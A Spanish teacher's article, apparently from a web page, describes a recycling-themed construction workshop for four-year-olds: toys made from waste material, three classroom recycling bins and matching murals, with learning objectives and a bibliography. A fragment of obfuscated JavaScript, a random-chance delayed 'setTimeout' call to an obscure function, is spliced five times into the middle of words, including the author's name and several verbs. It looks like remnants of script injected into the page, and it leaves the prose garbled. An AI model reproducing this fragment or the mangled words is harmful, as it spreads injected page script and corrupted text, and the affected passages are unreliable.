TALLER DE CONSTRUCCIÓN

Autora: María Fernandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda Rodríguez Rodríguez

          En este artículo voy a exponer cómo voy a trabajar en este curso 2010 / 2011 el taller de las construcciones. A través de este taller pretendo que mis alumnos/as tomen conciencia de la importancia del reciclaje, ya que el material usado se puede volver a reutilizar. Además, haremos hincapié en la importancia del uso de los contenedores.


 

Desarrollo de la actividad:

         Esta actividad va dirigida a los alumnos/as del segundo nivel del segundo ciclo de Educación Infantil, es decir, 4 años.


         Vamos a trabajar el área de Conocimiento del entorno.

        Se encuentra relacionada con los siguientes Objetivos generales de áreas:

-         Conocer y valorar la importancia del medio natural en general y en particular el de nuestra Comunidad Autónoma y de su calidad para la vida humana, manifestandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando hacia él actitudes de respeto, cuidado y responsabilidad en su conservación.

-         Observar y explorar de forma activa su entorno generandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando interpretaciones sobre algunas situaciones y hechos significativos y mostrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando interés por su conocimiento.


        Y el área de los Lenguajes: Comunicación y Representación.

        Se encuentra relacionada con el siguiente Objetivo general de área:

-         Acercarse al conocimiento de obras artísticas expresadas en distintos lenguajes y realizar actividades de representación y expresión artística mediante el empleo de diversas técnicas.


Bloque de contenido:

Acercamiento a la naturaleza. Y dentro de este bloque vamos a trabajar el siguiente contenido:

-         Contribución a la consecución y mantenimiento de ambientes limpios, saludables y no contaminados.

Lenguaje plástico. Y dentro de este bloque vamos a trabajar los siguientes contenidos:

-         Materiales útiles para la expresión plástica.

-         Utilización de las técnicas básicas del dibujo, pintura, modelado, “collage”, creación de imágenes…

Taller de construcción:

         En este taller mis alumnos/as construirán juguetes y para ello se van utilizar pinceles y temperas de forma correcta. Los juguetes se construirán con material de desecho que los niños y niñas han traído anteriormente.

         Los niños/as podrán construir coches, máscaras, muñecas, collares, marionetas, llaveros… Contaremos, entre otros, con los siguientes materiales: envases de plásticos, cajas de cartón, recortes de telas, bobinas sin hilo, palillos…


        Además, en este taller se elaborarán tres contenedores:

-          Contenedor azul que utiliza para el cartón y el papel.

-          Contenedor amarillo para el plástico y latas.

-          Y contenedor verde con forma de iglú para el vidrio.

        Estos contenedores serán colocados en el aula y serán utilizados por nuestros/as alumnos/as.

         Para que los niños/as tomen conciencia de qué cosa deben tirar en cada uno de los contenedores se elaborarán tres murales. Estos murales se colocarán junto a los contenedores.

        Un mural azul que contendrá recortes de folletos que contengan elementos que estén elaborados de cartón o de papel como cajas, folios…; otro amarillo, que contendrá recortes de folletos que estén elaborados con plástico como botellas… y otro verde, que contendrá recortes de folletos que estén elaborados con vidrio, como tarros…


        En la parte de arriba escribirán “CONTENEDOR……..”

        Este taller estará digerido por un padre, una madre y la maestra de psicomotricidad.

        Los alumnos/a irán al taller los lunes y viernes de 13:15 a 13:45.

 

Bibliografía:

  • -         Zabalza, M.A. Didáctica de la Educación Infantil. Ed. Narcea S.A. Madrid, 1987 
  • -         Piaget, J. y Inchelder, B.: La psicología del niño. Editorial Morata. Madrid, 1984.
  • -         Lowenfeld, Víctor y Brittain, W. Desarrollo de la capacidad creadora.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.